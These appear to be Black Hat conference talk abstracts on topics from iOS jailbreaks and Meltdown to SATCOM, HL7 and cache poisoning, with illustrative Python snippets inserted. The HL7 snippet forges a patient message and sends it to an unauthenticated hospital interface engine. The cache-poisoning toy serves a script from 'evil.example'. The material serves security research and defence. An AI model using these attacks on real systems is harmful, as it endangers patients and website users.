However, that assumption is not always correct. In the past few years, several logical issues have been reported by the security community, most of which were caused by operating systems incorrectly allowing read-only memory to be remapped as writable without marking it COW (copy-on-write). As a result, the memory content of the owner process is no longer trustworthy, causing memory corruption or even leading to userland privilege escalation. As operating systems have evolved, such issues have become rare. On the other hand, with stronger and more abundant features provided by peripheral components attached to mobile devices, DMA (direct memory access) technology enables fast data transfer between the host and peripheral devices. DMA relies on the IOMMU (Input/Output Memory Management Unit) for memory operations, so the memory protection mechanism provided by the CPU MMU is not available during a DMA transfer. In the middle of 2017, Gal Beniamini of the Google Project Zero team utilized DMA to successfully achieve device-to-host attacks on both the Nexus 6P and the iPhone 7. Nevertheless, this attack model usually only applies to device-to-host scenarios, where a firmware bug is needed to fully control the device. Unfortunately, DMA-related interfaces are not exposed to userland applications directly.
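As a small userland analogy (not the kernel bugs themselves), the sketch below shows the copy-on-write behaviour those logic flaws violate: a private (COW) mapping can be written freely, but the changes never reach the backing file, so the file's owner can keep trusting its contents.

```python
import mmap
import tempfile

with tempfile.TemporaryFile() as f:
    f.write(b"read-only secret")
    f.flush()

    # ACCESS_COPY gives a private, copy-on-write view of the file.
    cow = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_COPY)
    cow[0:4] = b"EVIL"                  # modifies only this process's copy
    print(cow[:16])                     # b'EVIL-only secret'

    f.seek(0)
    print(f.read())                     # b'read-only secret' -- backing file untouched
```

The kernel-level bugs described above arise when a read-only or shared mapping is incorrectly remapped as writable without this copy-on-write step.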
After months of research, we found an exception on iOS devices: Apple Graphics. At the MOSEC conference in 2017, we demonstrated a jailbreak of iOS 10.3.2 and iOS 11 beta 2, the latest versions at that time, on the iPhone 6s and iPhone 7. Details of the demonstration have never been published.
In this talk, we will introduce the concepts essential to our bugs, which include:
- Indirect DMA features exposed to iOS userland
- The implementation of IOMMU memory protection
- Notification mechanism between GPU and Apple Graphics driver
The next part will cover the details of two bugs: one in DMA handling of host virtual memory, and an out-of-bounds write issue caused by userland read-only memory that cannot actually be trusted.
Lastly, we will talk about how we combined two flaws across different Apple Graphics components to achieve reliable kernel code execution from the iOS application sandbox.
Recent advancements in OS security from Microsoft such as PatchGuard, Driver Signature Enforcement, and SecureBoot have helped curtail once-widespread commodity kernel mode malware such as TDL4 and ZeroAccess. However, advanced attackers have found ways of evading these protections and continue to leverage kernel mode malware to stay one step ahead of the defenders. We will examine the techniques from malware such as DoublePulsar, SlingShot, and Turla that help attackers evade endpoint defenses. We will also reveal a novel method to execute a fully kernel mode implant without hitting disk or being detected by security products. The method builds on publicly available tools which makes it easily within grasp of novice adversaries.
While attacker techniques have evolved to evade endpoint protections, the current state of the art in kernel malware detection has also advanced to hinder these new kernel mode threats. We will discuss these new defensive techniques to counter kernel mode threats, including real-time detection techniques that leverage hypervisors along with an innovative hardware-assisted approach that utilizes performance monitoring units. In addition, we will discuss on-demand techniques that leverage page table entry remapping to hunt for kernel malware at scale. To give defenders a leg up, we will release a tool that is effective at thwarting advanced kernel mode threats. Kernel mode threats will only continue to grow in prominence and impact. This talk will cover the latest attacker techniques in this area and release a new tool to curtail these attacks, providing real-world strategies for immediate implementation.
In 2014, we took to the stage and presented "A Wake-up Call for SATCOM Security," during which we described several theoretical scenarios that could result from the disturbingly weak security posture of multiple SATCOM products. Four years later, we are back at Black Hat to prove those scenarios are real.
Some of the largest airlines in the US and Europe had their entire fleets accessible from the Internet, exposing hundreds of in-flight aircraft. Sensitive NATO military bases in conflict zones were discovered through vulnerable SATCOM infrastructure. Vessels around the world are at risk, as attackers can use the vessels' own SATCOM antennas to expose the crew to RF radiation.
This time, in addition to describing the vulnerabilities, we will go one step further and demonstrate how to turn compromised SATCOM devices into RF weapons. This talk will cover new areas on the topic, such as reverse engineering, Radio Frequency (RF), SATCOM, embedded security, and transportation safety and security.
The Internet was a much different place 25 years ago. Technology and the free flow of information have rapidly changed the world forever. Along with that change came the frightening prospect of losing all of our privacy, attacks on our critical infrastructure, election tampering, invasive ad targeting, and the general paranoia that comes with knowing that no technology is safe. The law, regulatory bodies, and government policy have struggled to keep up with this change, but times are changing. In recent years, we have seen the legal community at the front of some of the most important battles regarding information security. The legal community's impact on information security is growing every year. This panel brings together some of those insightful and forward-thinking minds to discuss some of the emerging legal trends in security that will impact all of us tomorrow.
There has been much discussion of "software liability," and whether new laws are needed to encourage or require safer software. My presentation will discuss how -- regardless of whether new laws are passed -- a tidal wave of litigation over defective IoT cybersecurity is just over the horizon.
The presentation will focus on a well-known example: Charlie Miller and Chris Valasek's 2015 Jeep hack. I'm lead counsel in the ongoing federal litigation over the cybersecurity defects Charlie and Chris exposed, and that are shared by 1.4 million Chrysler vehicles. As far as I know, our case is one of the first, and the biggest, that involves claims that consumers should be compensated for inadequate cybersecurity in IoT products.
This case is the tip of the iceberg. IoT products are ubiquitous, and in general their cybersecurity is feeble, at best. In the event of a cyberphysical IoT hack that causes injury, there are established legal doctrines that can be used to impose liability on every company involved in the design, manufacturing, and distribution of an exploited IoT device or even its cyber-related components. Such liability could be crippling, if not fatal, for organizations that don't know how to properly handle and prepare for potential lawsuits.
Taking steps to minimize legal exposure before an accident happens or a lawsuit is filed—in the design, manufacture, product testing, and marketing phases of an IoT product—can be the difference between life and death for IoT companies. Knowing what steps to take and how to take them requires an understanding of the core legal principles that will be applied in determining whether a company is liable.
Back with another year of soul crushing statistics, the Black Hat NOC team will be sharing all of the data that keeps us equally puzzled, and entertained, year after year. We'll let you know all the tools and techniques we're using to set up, stabilize, and secure the network, and what changes we've made over the past year to try and keep doing things better. Of course, we'll be sharing some of the more humorous network activity and what it helps us learn about the way security professionals conduct themselves on an open WiFi network. Spoiler Alert: It's poorly. We conduct ourselves poorly.
The WinVote voting machine was used extensively in Virginia elections between 2004 and 2015. It has been dubbed the worst voting machine ever, and for good reason. It runs Windows XP, Service Pack 0. It has WiFi enabled by default. It uses WEP security, and all WinVote machines appear to use the same password, "abcde". Age-old exploits give adversaries administrator-level privileges without physical access to the machine, and to make matters worse, the Remote Desktop Protocol is enabled by default on each and every machine. All of this is well known and well documented; however, there are lessons to be learned that go beyond hacking, lessons that affect society as a whole.
The single most important concern of any electoral process is the trust of the voters: winners and losers alike must be convinced of the quality of the electoral process so that all are able to accept the outcome. This is a tall order, because, as we all know by now, national elections use election technologies in highly contested adversarial environments, where network, hardware, software, and configuration processes must be assumed to be under the adversary's control. The WinVote can be used as an instrument by hackers to influence the election result.
Using the WinVote voting machine as an example, I will demonstrate in my talk what threat WinVote machines and machines like it pose to democracy. And I will outline ways to achieve credible levels of election security. The key is evidence production, either in form of paper ballots, cryptographic proofs, multiple result paths, or statistical evidence. The WinVote doesn't implement any of these, hence it is the perfect stealth tool for adversaries.
This prompts the question of whether election meddling took place in Virginia at any time while WinVote machines were in service. After these machines were officially decommissioned in 2015, a number of them were released into the wild. We managed to secure a few of them and forensically analyzed them using standard tools and by comparing the contents of their respective drives. A few more machines are on their way. The evidence left on each machine consists of two SSD drives, one small (32MB) and one large (384MB or 512MB).
At the time of writing this report, no smoking gun indicating election meddling could be identified. However, we could clearly establish that some WinVote voting machines were used for purposes other than voting: one voting machine was used to rip songs from CDs and broadcast MP3s, most notably, perhaps, a Chinese song from 1995: 白雪-千古绝唱.mp3.
Trust in elections cannot be achieved through technology alone - it can only be achieved by the means of producing evidence and checking it for consistency. After Black Hat 2018, the United States has only approximately 90 days left to get ready for the 2018 midterm elections. By the time of writing this talk proposal, several States still use voting machines similar to the WinVote that do not produce any form of evidence.
Deep learning can help automate the signal analysis process in power side channel analysis. So far, power side channel analysis has relied on a combination of cryptanalytic science and the art of signal processing. Deep learning is essentially a classification algorithm, but instead of training it on cats, we train it to recognize different leakages in a chip. Better still, we do this in such a way that typical signal processing problems, such as noise reduction and re-alignment, are automatically solved by the deep learning network. We show we can break a lightly protected AES, an AES implementation with masking countermeasures, and a protected ECC implementation, and we give a live demo of the attack in action. These experiments show that where side channel analysis previously had a large dependency on the skills of the human, the first steps are being taken to bring down the attacker skill required for such attacks. This talk is targeted at a technical audience interested in the latest developments at the intersection of deep learning, side channel analysis, and security.
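As a rough sketch of the approach (shapes, architecture, and hyperparameters below are illustrative, not the presenters' actual models), a trace classifier can be as simple as a small PyTorch network trained to predict a key-dependent intermediate value directly from raw trace samples:

```python
import torch
import torch.nn as nn

n_traces, n_samples, n_classes = 10000, 700, 256
traces = torch.randn(n_traces, n_samples)            # stand-in for measured power traces
labels = torch.randint(0, n_classes, (n_traces,))    # stand-in for known intermediates (e.g. S-box outputs)

model = nn.Sequential(
    nn.Linear(n_samples, 200), nn.ReLU(),
    nn.Linear(200, 200), nn.ReLU(),
    nn.Linear(200, n_classes),        # one score per possible intermediate value
)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
loss_fn = nn.CrossEntropyLoss()

for epoch in range(20):               # full-batch training, for brevity only
    optimizer.zero_grad()
    loss = loss_fn(model(traces), labels)
    loss.backward()
    optimizer.step()

# Attack phase: combine per-trace class probabilities across many traces to rank
# key hypotheses; the network absorbs noise and (some) misalignment on its own.
probabilities = torch.softmax(model(traces[:100]), dim=1)
```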
The control and management of mobile networks is shifting from manual to automatic in order to boost performance and efficiency and reduce expenditures. In particular, base stations in today's 4G/LTE networks can automatically configure and operate themselves, a capability technically referred to as Self-Organizing Networks (SON). Additionally, they can auto-tune themselves by learning from their surrounding base stations. This talk inspects the consequences of operating a rogue base station in an automated 4G/LTE network. We exploit the weaknesses we discovered in 4G/LTE mobile phones and SON protocols to inject malicious packets into the network. We demonstrate several attacks against the network and discuss mitigations from the mobile network operators' perspective.
Speak with any Fortune 500 company running a mainframe and they'll tell you two things: (1) without their mainframes they'd be out of business, and (2) they do not conduct any security research on them, let alone vulnerability scans. The most infuriating part is that mainframes are simply computers; they're different from what you're used to, but that doesn't mean they can't be hacked. Previous talks about this topic have covered the platform from a high level, imploring you to do the basics. This talk continues that series of talks, given by others, around mainframe hacking. Previously covered topics included network penetration testing and privilege escalation. To complement those talks, this talk will expose attendees to the various tools that exist on the platform to help you do your own reverse engineering, followed by detailed steps on how to start your own exploit development. Attendees will learn which debuggers are available on the platform, such as dbx and ASMIDF, as well as the challenges you'll have using them. After learning how to RE, attendees will then learn how to develop their own exploits and buffer overflows on the platform using C, assembler, and JCL. A demo program will be used to teach all these items so people can follow along. Topics included in this discussion are APF authorization, bypassing RACF/ACEE, TSO, and Unix System Services.
Security is a constant cat-and-mouse game between those trying to keep abreast of and detect novel malware, and the authors attempting to evade detection. The introduction of the statistical methods of machine learning into this arms race allows us to examine an interesting question: how fast is malware being updated in response to the pressure exerted by security practitioners? The ability of machine learning models to detect malware is now well known; we introduce a novel technique that uses trained models to measure "concept drift" in malware samples over time as old campaigns are retired, new campaigns are introduced, and existing campaigns are modified. Through the use of both simple distance-based metrics and Fisher Information measures, we look at the evolution of the threat landscape over time, with some surprising findings. In parallel with this talk, we will also release the PyTorch-based tools we have developed to address this question, allowing attendees to investigate concept drift within their own data.
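The released tooling aside, one simple distance-based drift measure (a sketch of the general idea, not necessarily the exact metric used in the talk) is to score each month's samples with a fixed, trained model and compare consecutive months' score distributions:

```python
import numpy as np

def score_histogram(model_scores, bins=50):
    """Normalized histogram of a model's scores (assumed to lie in [0, 1])."""
    hist, _ = np.histogram(model_scores, bins=bins, range=(0.0, 1.0), density=True)
    return hist / (hist.sum() + 1e-12)

def monthly_drift(scores_by_month):
    """Hellinger distance between consecutive months' score distributions."""
    months = sorted(scores_by_month)
    drift = {}
    for prev, cur in zip(months, months[1:]):
        p = score_histogram(scores_by_month[prev])
        q = score_histogram(scores_by_month[cur])
        drift[cur] = np.sqrt(0.5 * np.sum((np.sqrt(p) - np.sqrt(q)) ** 2))
    return drift

# scores_by_month = {"2017-01": model.predict_proba(X_jan)[:, 1], ...}  # hypothetical usage
```

A sudden jump in this distance suggests the incoming samples no longer resemble what the model was trained on, i.e. a campaign change or deliberate evasion.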
The security of computer systems fundamentally relies on the principle of confidentiality. Confidentiality is typically provided through memory isolation, e.g., kernel address ranges are marked as non-accessible and are protected from user access.
In this talk, we present Meltdown. Meltdown breaks the most fundamental isolation between user applications and the operating system. We show how any program can access system memory, including secrets of other programs and the operating system. To make the attack accessible, we briefly introduce basics on microarchitectural side effects and out-of-order execution on modern processors.
With a behind-the-scenes timeline of our research, we show when and how the combination of these components allowed us to read arbitrary kernel-memory locations including personal data and passwords. We will also discuss how different vendors, i.e., Intel, AMD, and ARM, are affected by the issue and how they responded to these issues.
In a live demo, we show a series of Meltdown attacks, including attacks on a modern smartphone with an ARM processor. Our demo not only shows how to read privileged data or sensitive user input, but also shows novel exploits leveraging Meltdown. We then show how Meltdown is mitigated in software, using our KAISER defense mechanism, which was implemented under different names in all major operating systems.
The last part of our talk will focus on the developments after the disclosure of Meltdown. We will discuss the situation around the patches, Meltdown variants that were presented after the disclosure (e.g., MeltdownPrime), as-yet-undisclosed attacks, including combinations of Meltdown and Spectre and their application in JavaScript, and further proposed mitigations.
We conclude with the high-level lessons we as a community and industry should draw to be prepared for the next Meltdown.
It's not easy to miss the gunshot wound in the trauma bay, or the cough of a rip-roaring pneumonia. But as anyone who has struggled with mental illness can attest- psychic wounds run just as deep, yet are often shunned or ignored by family, friends, coworkers, and even healthcare professionals. This needs to change.
Mental illness affects one in five Americans, and suicide is the second leading cause of death for people in their early twenties. Chances are if you haven't struggled with depression yourself you know someone who has, and the hacker community is not immune to the pressures of high stress jobs, abnormal sleep schedules, social depersonalization, and many of the other risk factors predisposing to substance use disorders or suicide.
Join Christian Dameff, a hacker moonlighting on the front lines of healthcare as an emergency medicine physician, and Jay Radcliffe, world-renowned security researcher who has struggled with depression, ADHD, and a variety of other mental health conditions, as they work to shatter the stigma and silence surrounding this monumental crisis affecting the hacker community - and society - at large. Combining the latest in evidence-based medicine and pharmacology with powerful anecdotes of personal experience combatting depression, this talk will educate, challenge, and invigorate you with a hope-filled and simple message: you are not alone, and you are surrounded by friends who want to help.
Miasm is a reverse engineering framework created in 2006 and first published in 2011 (GPL). Since then, it has been continuously improved through daily use. The framework is made of several parts, including an assembler/disassembler for several architectures (x86, aarch64, arm, etc.), a human-readable intermediate language describing the semantics of their instructions, and sandboxing capabilities for Windows/Linux environments. On top of these foundations, higher-level analyses are provided to address more complex tasks, such as variable backtracking and dynamic symbolic execution.
In this talk, we will introduce some of these features. The journey will start with the basics of the framework, go through symbolic emulation and function divination (Sibyl), and end with various components useful for malware analysis.
We will also talk about some of the new features which will be released for Black Hat. For example, the freshly implemented SSA transformation will be illustrated by applications in code simplification. Then, we will demonstrate how this feature, jointly with new operator descriptions, enables more accurate code analyses. Finally, we will highlight what better environment simulation and wider support for recent instructions provide.
Miasm being a practical tool, each topic will be covered with real life use-cases.
Right now, combatting credit card fraud is mostly a reactionary process. Issuers wait until transactions occur that either appear fraudulent according to rules-based analytic engines or are reported by customers, and only then do they intervene to prevent further fraud. But by then, it's often too late - losses through merchandise theft, investigation cost, reissuance, etc., have already occurred, and those losses have piled up into over $10B of stolen funds each year being pumped into the online criminal ecosystem.
There is a better way. By using intelligence gathered from online sources such as the dark web combined with transactional data, we demonstrate predictive analytics that can not only identify who the next fraud victims will be, but also where card data is being stolen from, all before any fraudulent transactions have occurred.
Payment card fraud is the slush fund that underlies most global criminal threats, from organized crime to political meddling, in large part because of antiquated, reactive techniques and a dearth of innovative techniques to more proactively combat it. Our approach represents a paradigm shift in fighting payment card fraud; by using dark web market intelligence combined with transaction data to predict both fraudulent charges and points of compromise, we can intervene before any loss occurs, stopping payment card fraud dead in its tracks and eliminating a major source of funding for the global criminal ecosystem.
After the last round of the UN-sponsored consultations on international cybersecurity collapsed in 2016, the international situation in cyber diplomacy has been in flux: will there be other UN rounds of discussion? Will private sector-organized initiatives claim a role? And what norms and rules of behavior in cyberspace for state (and non-state) actors will be agreed? The Global Commission on the Stability of Cyberspace has been working on these issues, and at Black Hat some of its members will discuss the new norms (e.g., safeguarding the critical infrastructure of the Internet, protecting electoral systems from attack, etc.) and provide insight into the current thinking of the Commission, as well as of governments, international organizations, and major corporations working on the subject worldwide.
As finding reliably exploitable vulnerabilities in web browser engines becomes gradually harder, attackers turn to previously less explored areas of the code. One of these seems especially interesting: just-in-time (JIT) compilers built into the JavaScript engines to maximize their performance by turning JavaScript code into optimized machine code at runtime. With commonly multiple tiers of JIT compilers (that is, multiple different compilers) and an excessive focus on performance at the cost of added complexity, they are an attractive target for security researchers. Furthermore, the bugs found in them often turn out to be easily and reliably exploitable. Last but not least, JIT compilers appear to be "future proof" targets as their prevalence (and complexity) will likely continue to grow in the future.
This talk will explore the inner workings of JIT compilers for the JavaScript language with a focus on security relevant aspects. First, the challenges faced by such compilers as well as the common solutions implemented by the most prominent engines will be described. Afterwards, the attack surface of client-side JIT compilers will be explored together with a discussion of the rather unique vulnerabilities frequently found in them. Finally, a specific, but fairly typical JIT compiler vulnerability will be presented, along with the process of its discovery. This vulnerability was used in Pwn2Own 2018 to successfully exploit Safari on macOS. A brief walkthrough of its exploitation, yielding a near 100% reliable exploit that completes within a few milliseconds, will conclude this talk.
Live video streaming services are getting more and more popular in China. In order to protect their own interests, various service providers have added visible watermarks, which have become increasingly aggressive and intrusive. Users (originators and viewers) are fed up with those ugly watermarks, which are taking up more and more of the screen.
We have found that some of the service providers' watermarks can be actively eliminated; that is, originators can place a reverse watermark in their own video stream beforehand to cancel the service provider's watermark. Although the idea is intuitive, there are some problems in implementation, such as size, position, and shadow. After theoretically estimating the achievable limits with computer graphics theory, we did a PoC against one of the largest video streaming service providers in China, which is also listed on the NYSE. The results were very good: after solving some problems related to color management and color space conversion parameters, we can achieve nearly 100% active cancellation of watermarks.
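As a rough model of what "reverse watermarking" can mean, assume the provider composites its watermark by straightforward per-pixel alpha blending; the uploaded frame can then be pre-distorted so the provider's blend restores the original. The real pipeline also involves color management, color space conversion, and codec effects, which is exactly where the problems mentioned above come from; this sketch ignores them.

```python
import numpy as np

def precompensate(frame, watermark, alpha):
    """Pre-distort a frame so that alpha-blending the watermark on top restores it.
    frame, watermark: float arrays in [0, 1]; alpha: scalar or array in [0, 1)."""
    compensated = (frame - alpha * watermark) / (1.0 - alpha)
    return np.clip(compensated, 0.0, 1.0)   # clipping is where cancellation degrades

frame = np.random.rand(720, 1280, 3)        # original content
watermark = np.random.rand(720, 1280, 3)    # provider's overlay (assumed known)
alpha = 0.3                                  # provider's (assumed) blending factor

uploaded = precompensate(frame, watermark, alpha)
broadcast = (1 - alpha) * uploaded + alpha * watermark   # what the provider is assumed to do

error = np.abs(broadcast - frame)
print(error.max(), (error > 1e-6).mean())    # residual error only where clipping kicked in
```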
To automate this process, we also built an ffmpeg filter as well as an OBS plugin, which perform real-time adjustment with a very short training sequence of frames during live broadcasting, so as to achieve a better watermark cancellation effect.
In addition, we propose several remaining risks for watermarks that cannot be actively canceled: a) Transform Attack: transforming one watermark into another provider's. b) Code Rate Jitter Attack: adding high-frequency components to force the video codec to reduce the code rate near the watermark. c) Frame Squeezing Attack: sacrificing some resolution by squeezing the screen, then restoring it with user-defined JavaScript to bypass the watermark. Corresponding examples and security countermeasures are also provided.
Many new devices are trying to fit into our lives seamlessly. As a result, there's a quest for a "universal access method" for all devices. Voice activation seems to be a natural candidate for the task, and many implementations of it have surfaced in recent years. A few notable examples are Amazon's Alexa, Google's Assistant, and Microsoft's Cortana.
The problem starts when these "universal" access methods, aimed at maximal comfort, meet the very specific use-case of the enterprise environment, which requires comfort to be balanced with other aspects, such as security. Microsoft Cortana is used on mobile and IoT devices, but also on enterprise computers, as it comes enabled by default with Windows 10 and is always ready to respond to users' commands, even when the machine is locked.
Allowing interaction with a locked machine is a dangerous architectural decision, and earlier this year, we exposed the Voice of Esau (VoE) exploit for a Cortana vulnerability. The VoE exploit allowed attackers to take over a locked Windows 10 machine by combining voice commands and network fiddling to deliver a malicious payload to the victim machine.
In this presentation, we will reveal the "Open Sesame" vulnerability, a much more powerful vulnerability in Cortana that allows attackers to take over a locked Windows machine and execute arbitrary code. Exploiting the "Open Sesame" vulnerability, attackers can view the contents of sensitive files (text and media), browse arbitrary web sites, download and execute arbitrary executables from the Internet, and under some circumstances gain elevated privileges. To make matters even worse, exploiting the vulnerability does not involve ANY external code, nor shady system calls, hence making code-focused defenses such as Antivirus, Anti-malware, and IPS blind to the attack.
We will conclude by suggesting some defense mechanisms and compensating controls to detect and defend against such attacks.
The term "smart city" evokes imagery of flying cars, shop windows that double as informational touchscreens, and other retro-futuristic fantasies of what the future may hold. Stepping away from the smart city fantasy, the reality is actually much more mundane. Many of these technologies have already quietly been deployed in cities across the world. In this talk, we examine the security of a cross-section of smart city devices currently in use today to reveal how deeply flawed they are and how the implications of these vulnerabilities could have serious consequences.
In addition to discussing newly discovered pre-auth attacks against multiple smart city devices from different categories of smart city technology, this presentation will discuss methods for how to figure out what smart city tech a given city is using, the privacy implications of smart cities, the implications of successful attacks on smart city tech, and what the future of smart city tech may hold.
We, Keen Security Lab of Tencent, successfully implemented two remote attacks on the Tesla Model S/X in 2016 and 2017. Last year, at Black Hat USA, we presented the details of our first attack chain. At that time, we showed a demonstration video of our second attack chain, but without the technical aspects. This year, we will share the full, in-depth details of this research.
In this presentation, we will explain the inner workings of this technology and showcase the new capability that was developed in the 2017 Tesla hack. Multiple 0-days in different in-vehicle components are included in the new attack chain.
We will also present an in-depth analysis of the critical components in the Tesla car, including the Gateway, the BCM (Body Control Module), and the Autopilot ECUs. For instance, we utilized a code-signing bypass vulnerability to compromise the Gateway ECU; we also reversed and then customized the BCM to play the Model X "Holiday Show" Easter egg for entertainment.
Finally, we will talk about a remote attack we carried out to gain unauthorized access to the Autopilot ECU on the Tesla car by exploiting one more fascinating vulnerability. To the best of our knowledge, this presentation will be the first to demonstrate hacking into an Autopilot module.
Healthcare infosec is in critical condition- too few bodies, underfunded to a fault, and limping along on legacy systems stuffed with vulnerabilities. From exploited insulin/medication pumps to broken pacemakers, no implantable or medical device is safe. But there's an even bigger risk on the horizon.
WannaCry was a wake-up call: when you knock out systems that enable a hospital to care for patients, you start knocking out patients. Hospitals are no longer secure by virtue of being obscure; connected infrastructure means vulnerable infrastructure.
The HL7 standards comprise the backbone of clinical data transfer, used in every hospital around the globe. Frequently implemented as plain-text messages sent across flat networks with no authentication or verification, HL7 is both critically ubiquitous and massively unsecured, and thus every lab sample, every medical image, every doctor's order becomes a potential time bomb.
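To illustrate how little stands between an attacker on such a flat network and the clinical data flow, the sketch below hand-builds a syntactically valid HL7 v2 message and pushes it over MLLP, the thin TCP framing commonly used. The host, port, and field values are invented for illustration, and nothing in the exchange authenticates the sender.

```python
import socket

# Pipe-delimited HL7 v2 segments, separated by carriage returns.
hl7_message = "\r".join([
    "MSH|^~\\&|EVIL|LAB|HIS|HOSP|20180808120000||ADT^A08|MSG00001|P|2.3",
    "PID|1||123456^^^HOSP||DOE^JANE||19700101|F",
]) + "\r"

# MLLP framing: 0x0B start block, 0x1C 0x0D end block. No credentials, no TLS.
frame = b"\x0b" + hl7_message.encode("ascii") + b"\x1c\x0d"

with socket.create_connection(("interface-engine.example", 2575)) as sock:
    sock.sendall(frame)
    ack = sock.recv(4096)    # many engines simply ACK any well-formed message
```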
Join Quaddi and r3plicant, hackers who moonlight as physicians, and Maxwell Bland as they explore the myriad of ways in which HL7 attacks can be used to subvert the implicit trust doctors place in this infrastructure- and just how catastrophic that broken trust can be. Come for the sobering premise, stay for the live HL7 attack demo- but be warned: there will be blood.
TLS 1.3 is the new secure communication protocol that should already be with us. One of its new features is 0-RTT (Zero Round Trip Time Resumption), which could potentially allow replay attacks. This is a known issue acknowledged by the TLS 1.3 specification: the protocol does not provide replay protections for 0-RTT data, but instead proposes countermeasures that would need to be implemented at other layers, not at the protocol level. Therefore, applications deployed with TLS 1.3 support could end up exposed to replay attacks depending on the implementation of those protections.
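One example of the kind of application-layer countermeasure the specification pushes onto implementers, sketched here under assumed request attributes (the `was_early_data` flag and the request fingerprint are placeholders for whatever your server stack exposes): treat everything that arrived as 0-RTT as replayable, allow it only if it should be idempotent or has not been seen recently, and otherwise force the client to retry after the full handshake.

```python
import time

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}   # methods that should have no side effects
WINDOW_SECONDS = 10.0                        # how long to remember early-data requests
_seen = {}                                   # request fingerprint -> first-seen time

def allow_request(method, fingerprint, was_early_data):
    if not was_early_data:
        return True                          # 1-RTT data already has replay protection
    if method in SAFE_METHODS:
        return True
    now = time.time()
    for key, first_seen in list(_seen.items()):
        if now - first_seen > WINDOW_SECONDS:
            del _seen[key]                   # bound memory use
    if fingerprint in _seen:
        return False                         # duplicate within the window: treat as a replay
    _seen[fingerprint] = now
    return True                              # or: reject and let the client retry post-handshake
```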
This talk will describe the technical details regarding the TLS 1.3 0-RTT feature and its associated risks. It will include Proof of Concepts (PoC) showing real-world replay attacks against TLS 1.3 libraries and browsers. Finally, potential solutions or mitigation controls would be discussed that will help to prevent those attacks when deploying software using a library with TLS 1.3 support.
Modern web applications are composed from a crude patchwork of caches and content delivery networks. In this session I'll show you how to compromise websites by using esoteric web features to turn their caches into exploit delivery systems, targeting everyone that makes the mistake of visiting their homepage.
I'll illustrate and develop this technique with vulnerabilities that handed me control over numerous well known websites and frameworks, progressing from simple single-request attacks to intricate exploit chains that hijack JavaScript, pivot across cache layers, subvert social media and misdirect cloud services in pursuit of the perfect exploit.
Unlike previous cache poisoning techniques, this approach doesn't rely on other vulnerabilities like response splitting, or cache-server quirks that are easily patched away. Instead, it exploits core principles of caching, and as such affects caching solutions indiscriminately. The repercussions also extend beyond websites - I'll show how using this approach, I was able to compromise Mozilla infrastructure and partially hijack a notorious Firefox feature, letting me conduct tens of millions of Firefox browsers as my personal low-fat botnet.
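As a toy model of the core principle (the header name and URLs are illustrative, not any specific target): the cache keys on less of the request than the application actually uses, so the first requester to populate an entry controls what every later visitor receives.

```python
# Hypothetical application that reflects a header into the page...
def application(path, headers):
    host = headers.get("X-Forwarded-Host", "www.example.com")
    return f'<script src="https://{host}/static/app.js"></script>'

cache = {}

# ...sitting behind a cache that keys only on the path.
def cached_get(path, headers):
    key = path                                   # X-Forwarded-Host is "unkeyed"
    if key not in cache:
        cache[key] = application(path, headers)  # first requester controls the entry
    return cache[key]

# The attacker seeds the cache once...
cached_get("/", {"X-Forwarded-Host": "evil.example"})
# ...and every later visitor to "/" gets the attacker's script URL.
print(cached_get("/", {}))   # <script src="https://evil.example/static/app.js"></script>
```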
In addition to sharing a thorough detection methodology, I'll also release and open source the Burp Suite Community extension that fueled this research. You'll leave with an altered perspective on web exploitation, and an appreciation that the simple act of placing a cache in front of a website can take it from completely secure to critically vulnerable.
Humans are susceptible to social engineering. Machines are susceptible to tampering. Machine learning is vulnerable to adversarial attacks. Researchers have been able to successfully attack deep learning models used to classify malware to completely change their predictions by only accessing the output label of the model for the input samples fed by the attacker. Moreover, we've also seen attackers attempting to poison our training data for ML models by sending fake telemetry and trying to fool the classifier into believing that a given set of malware samples are actually benign. How do we detect and protect against such attacks? Is there a way we can make our models more robust to future attacks?
We'll discuss several strategies to make machine learning models more tamper resilient. We'll compare the difficulty of tampering with cloud-based models and client-based models. We'll discuss research that shows how singular models are susceptible to tampering, and some techniques, like stacked ensemble models, can be used to make them more resilient. We also talk about the importance of diversity in base ML models and technical details on how they can be optimized to handle different threat scenarios. Lastly, we'll describe suspected tampering activity we've witnessed using protection telemetry from over half a billion computers, and whether our mitigations worked.
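As a minimal sketch of the stacked-ensemble idea mentioned above (using scikit-learn and synthetic data as stand-ins for any production pipeline), diverse base models are combined by a meta-model trained on their out-of-fold predictions, so tampering that fools one base learner is less likely to fool the ensemble:

```python
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier, StackingClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB

X, y = make_classification(n_samples=2000, n_features=40, random_state=0)  # stand-in telemetry

stack = StackingClassifier(
    estimators=[
        ("forest", RandomForestClassifier(n_estimators=100, random_state=0)),
        ("linear", LogisticRegression(max_iter=1000)),
        ("nb", GaussianNB()),
    ],
    final_estimator=LogisticRegression(max_iter=1000),
    cv=5,  # out-of-fold predictions keep the meta-model from overfitting the bases
)
stack.fit(X, y)
print(stack.predict_proba(X[:5]))
```

The diversity of the base learners is what matters here: an adversarial perturbation crafted against one model family tends to transfer poorly to models with very different decision boundaries.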
Recent advancements have reinvented deception technologies and their use as a security layer of defense, making them no longer passé but so effective and believable that they are fast-becoming widespread in mature organizations. Many security providers now successfully disrupt attacks by offering comprehensive deception capabilities, featuring a variety of traps, deceits, and lures distributed across the enterprise's internal environment. While deception is a legitimate (and cool) threat detection and response strategy, like any other security trend, adversaries will inevitably adapt.
In this talk, we will discuss key weaknesses in deception technologies enabling a persistent attacker to overcome modern advanced deception techniques and beat deception solutions at their own game. We will share some guidelines, tactics, and a new open-source tool to arm red teams with the knowledge needed to avoid getting trapped during their next engagement.
Volume Shadow Copy Service (VSS) is a backup feature of recent Windows OSes. You can create storage snapshots by using VSS. If users refer to a snapshot, they can recover its contents. VSS is one of the most important mechanisms for restoring deleted files, such as files created by attackers (e.g., attack tools), in computer forensic work.
However, in recent years, ransomware has deleted the snapshots before encrypting files. When the snapshots are deleted, there is no official way to access them. But if we can recover the deleted snapshots, we can recover the files that were managed by those snapshots and that would otherwise have been lost.
Roughly speaking, VSS manages two kinds of data. One is called the "Catalog" and the other is called the "Store." These files are located in the "System Volume Information" folder. The meta-information of VSS snapshots, such as creation date and time and offsets to store data, is kept in the catalog file. The differential data between the current NTFS volume and a snapshot is kept in store files, and a store file is created for every snapshot.
